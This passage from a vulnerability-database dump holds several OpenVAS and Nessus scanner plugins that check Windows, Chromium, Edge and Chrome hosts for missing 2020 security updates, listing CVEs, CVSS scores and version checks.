Windows 10 Version 1803 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please\n see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4550922\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"Kernel32.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.17134.0\", test_version2:\"10.0.17134.1424\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Kernel32.dll\",\n file_version:dllVer, vulnerable_range:\"10.0.17134.0 - 10.0.17134.1424\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:51:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0950", "CVE-2020-1016", "CVE-2020-0967", "CVE-2020-0983", "CVE-2020-0962", "CVE-2020-0687", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0946", "CVE-2020-0948", "CVE-2020-0958", "CVE-2020-0794", "CVE-2020-0987", "CVE-2020-0784", "CVE-2020-0992", "CVE-2020-1008", "CVE-2020-1094", "CVE-2020-0940", "CVE-2020-0699", "CVE-2020-0959", "CVE-2020-1017", "CVE-2020-0956", "CVE-2020-0949", "CVE-2020-1001", "CVE-2020-0953", "CVE-2020-0888", "CVE-2020-0938", "CVE-2020-0952", "CVE-2020-0942", "CVE-2020-0993", "CVE-2020-0945", "CVE-2020-0988", "CVE-2020-1014", "CVE-2020-0937", "CVE-2020-0985", "CVE-2020-1003", "CVE-2020-1000", "CVE-2020-1006", "CVE-2020-1011", "CVE-2020-0944", "CVE-2020-0821", "CVE-2020-1005", "CVE-2020-1029", "CVE-2020-0999", "CVE-2020-0995", "CVE-2020-0969", "CVE-2020-0960", "CVE-2020-0964", "CVE-2020-0982", "CVE-2020-1015", "CVE-2020-0955", "CVE-2020-1027", "CVE-2020-1020", "CVE-2020-0889", "CVE-2020-1009", "CVE-2020-0968", "CVE-2020-0966", "CVE-2020-1007", "CVE-2020-0936", "CVE-2020-1004", "CVE-2020-0994", "CVE-2020-0965"], "description": "This host is missing a critical security\n update according to Microsoft KB4550927", "modified": "2020-07-17T00:00:00", "published": "2020-04-15T00:00:00", "id": "OPENVAS:1361412562310816828", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816828", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4550927)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816828\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0687\", \"CVE-2020-0699\", \"CVE-2020-0784\", \"CVE-2020-0794\",\n \"CVE-2020-0821\", \"CVE-2020-0888\", \"CVE-2020-0889\", \"CVE-2020-0895\",\n \"CVE-2020-0907\", \"CVE-2020-0936\", \"CVE-2020-0937\", \"CVE-2020-0938\",\n \"CVE-2020-0940\", \"CVE-2020-0942\", \"CVE-2020-0944\", \"CVE-2020-0945\",\n \"CVE-2020-0946\", \"CVE-2020-0948\", \"CVE-2020-0949\", \"CVE-2020-0950\",\n \"CVE-2020-0952\", \"CVE-2020-0953\", \"CVE-2020-0955\", \"CVE-2020-0956\",\n \"CVE-2020-0958\", \"CVE-2020-0959\", \"CVE-2020-0960\", \"CVE-2020-0962\",\n \"CVE-2020-0964\", \"CVE-2020-0965\", \"CVE-2020-0966\", \"CVE-2020-0967\",\n \"CVE-2020-0968\", \"CVE-2020-0969\", \"CVE-2020-0982\", \"CVE-2020-0983\",\n \"CVE-2020-0985\", \"CVE-2020-0987\", \"CVE-2020-0988\", \"CVE-2020-0992\",\n \"CVE-2020-0993\", \"CVE-2020-0994\", \"CVE-2020-0995\", \"CVE-2020-0999\",\n \"CVE-2020-1000\", \"CVE-2020-1001\", \"CVE-2020-1003\", \"CVE-2020-1004\",\n \"CVE-2020-1005\", \"CVE-2020-1006\", \"CVE-2020-1007\", \"CVE-2020-1008\",\n \"CVE-2020-1009\", \"CVE-2020-1011\", \"CVE-2020-1014\", \"CVE-2020-1015\",\n \"CVE-2020-1016\", \"CVE-2020-1017\", \"CVE-2020-1020\", \"CVE-2020-1027\",\n \"CVE-2020-1029\", \"CVE-2020-1094\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-04-15 08:39:55 +0530 (Wed, 15 Apr 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4550927)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4550927\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error in the way that the scripting engine handles objects in memory\n in Internet Explorer.\n\n - Multiple errors when the Microsoft Windows Graphics Component improperly\n handles objects in memory.\n\n - An error when the Windows Jet Database Engine improperly handles objects\n in memory.\n\n - An error when the Windows update stack fails to properly handle objects in\n memory.\n\n - An error when the Windows Delivery Optimization service improperly handles\n objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privilges, disclose sensitive information and\n conduct denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1709 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1709 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4550927\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"Kernel32.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.16299.0\", test_version2:\"10.0.16299.1805\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Kernel32.dll\",\n file_version:dllVer, vulnerable_range:\"10.0.16299.0 - 10.0.16299.1805\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-02-05T20:58:52", "description": "This update for chromium fixes the following issues :\n\nChromium was updated to version 80.0.3987.122 (bsc#1164828).\n\nSecurity issues fixed :\n\n - CVE-2020-6418: Fixed a type confusion in V8\n (bsc#1164828).\n\n - CVE-2020-6407: Fixed an OOB memory access in streams\n (bsc#1164828).\n\n - Fixed an integer overflow in ICU (bsc#1164828).\n\nNon-security issues fixed :\n\n - Dropped the sandbox binary as it should not be needed\n anymore (bsc#1163588).", "edition": 3, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-02-28T00:00:00", "title": "openSUSE Security Update : chromium (openSUSE-2020-259)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2020-02-28T00:00:00", "cpe": ["cpe:/o:novell:opensuse:15.1", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debugsource", "p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromium-debuginfo"], "id": "OPENSUSE-2020-259.NASL", "href": "https://www.tenable.com/plugins/nessus/134157", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-259.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(134157);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/04\");\n\n script_cve_id(\"CVE-2020-6407\", \"CVE-2020-6418\");\n\n script_name(english:\"openSUSE Security Update : chromium (openSUSE-2020-259)\");\n script_summary(english:\"Check for the openSUSE-2020-259 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for chromium fixes the following issues :\n\nChromium was updated to version 80.0.3987.122 (bsc#1164828).\n\nSecurity issues fixed :\n\n - CVE-2020-6418: Fixed a type confusion in V8\n (bsc#1164828).\n\n - CVE-2020-6407: Fixed an OOB memory access in streams\n (bsc#1164828).\n\n - Fixed an integer overflow in ICU (bsc#1164828).\n\nNon-security issues fixed :\n\n - Dropped the sandbox binary as it should not be needed\n anymore (bsc#1163588).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1163484\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1163588\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1164828\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/02/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromedriver-80.0.3987.122-lp151.2.66.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromedriver-debuginfo-80.0.3987.122-lp151.2.66.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-80.0.3987.122-lp151.2.66.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-debuginfo-80.0.3987.122-lp151.2.66.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-debugsource-80.0.3987.122-lp151.2.66.1\", allowmaj:TRUE) ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-04T03:52:39", "description": "The version of Microsoft Edge (Chromium) installed on the remote Windows host is prior to 80.0.361.62. It is,\ntherefore, affected by multiple vulnerabilities:\n\n - An out-of-bounds memory access error exists in Google Chrome. An unauthenticated, remote attacker can\n exploit this, via a crafted HTML page, to potentially exploit heap corruption. (CVE-2020-6407)\n\n - A type confusion error exists in the V8 component of Google Chrome. An unauthenticated, remote attacker\n can exploit this, via a crafted HTML page, to potentially exploit heap corruption. (CVE-2020-6418)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.", "edition": 5, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-07-07T00:00:00", "title": "Microsoft Edge (Chromium) < 80.0.361.62 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2020-07-07T00:00:00", "cpe": ["cpe:/a:microsoft:edge"], "id": "MICROSOFT_EDGE_CHROMIUM_80_0_361_62.NASL", "href": "https://www.tenable.com/plugins/nessus/138176", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138176);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/02\");\n\n script_cve_id(\"CVE-2020-6407\", \"CVE-2020-6418\");\n\n script_name(english:\"Microsoft Edge (Chromium) < 80.0.361.62 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an web browser installed that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Microsoft Edge (Chromium) installed on the remote Windows host is prior to 80.0.361.62. It is,\ntherefore, affected by multiple vulnerabilities:\n\n - An out-of-bounds memory access error exists in Google Chrome. An unauthenticated, remote attacker can\n exploit this, via a crafted HTML page, to potentially exploit heap corruption. (CVE-2020-6407)\n\n - A type confusion error exists in the V8 component of Google Chrome. An unauthenticated, remote attacker\n can exploit this, via a crafted HTML page, to potentially exploit heap corruption. (CVE-2020-6418)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n # https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200002\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b4f0f972\");\n # https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2ec7f076\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Microsoft Edge (Chromium) 80.0.361.62 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6407\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_edge_chromium_installed.nbin\");\n script_require_keys(\"installed_sw/Microsoft Edge (Chromium)\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\n\napp_info = vcf::get_app_info(app:'Microsoft Edge (Chromium)', win_local:TRUE);\n\nconstraints = [{ 'fixed_version' : '80.0.361.62' }];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-04T03:17:11", "description": "The version of Google Chrome installed on the remote Windows host is prior to 80.0.3987.122. It is, therefore, affected\nby multiple vulnerabilities as referenced in the 2020_02_stable-channel-update-for-desktop_24 advisory. Note that Nessus\nhas not tested for this issue but has instead relied only on the application's self-reported version number.", "edition": 3, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-02-24T00:00:00", "title": "Google Chrome < 80.0.3987.122 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2020-02-24T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_80_0_3987_122.NASL", "href": "https://www.tenable.com/plugins/nessus/133954", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(133954);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/02\");\n\n script_cve_id(\"CVE-2020-6407\", \"CVE-2020-6418\");\n\n script_name(english:\"Google Chrome < 80.0.3987.122 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is prior to 80.0.3987.122. It is, therefore, affected\nby multiple vulnerabilities as referenced in the 2020_02_stable-channel-update-for-desktop_24 advisory. Note that Nessus\nhas not tested for this issue but has instead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?aae39d39\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1045931\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1053604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1044570\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 80.0.3987.122 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6407\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/02/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('SMB/Google_Chrome/Installed');\ninstalls = get_kb_list('SMB/Google_Chrome/*');\n\ngoogle_chrome_check_version(installs:installs, fix:'80.0.3987.122', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-04T03:41:55", "description": "The version of Google Chrome installed on the remote macOS host is prior to 80.0.3987.122. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the 2020_02_stable-channel-update-for-desktop_24 advisory. Note that Nessus\nhas not tested for this issue but has instead relied only on the application's self-reported version number.", "edition": 3, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-02-24T00:00:00", "title": "Google Chrome < 80.0.3987.122 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2020-02-24T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_80_0_3987_122.NASL", "href": "https://www.tenable.com/plugins/nessus/133953", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(133953);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/02\");\n\n script_cve_id(\"CVE-2020-6407\", \"CVE-2020-6418\");\n\n script_name(english:\"Google Chrome < 80.0.3987.122 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is prior to 80.0.3987.122. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the 2020_02_stable-channel-update-for-desktop_24 advisory. Note that Nessus\nhas not tested for this issue but has instead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?aae39d39\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1045931\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1053604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1044570\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 80.0.3987.122 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6407\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/02/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('MacOSX/Google Chrome/Installed');\n\ngoogle_chrome_check_version(fix:'80.0.3987.122', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-21T05:57:02", "description": "An update for chromium-browser is now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 80.0.3987.122.\n\nSecurity Fix(es) :\n\n* ICU: Integer overflow in UnicodeString::doAppend() (BZ#1807349)\n\n* chromium-browser: Type confusion in V8 (CVE-2020-6383)\n\n* chromium-browser: Use after free in WebAudio (CVE-2020-6384)\n\n* chromium-browser: Use after free in speech (CVE-2020-6386)\n\n* chromium-browser: Out of bounds memory access in streams (CVE-2020-6407)\n\n* chromium-browser: Type confusion in V8 (CVE-2020-6418)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "edition": 3, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-03-10T00:00:00", "title": "RHEL 6 : chromium-browser 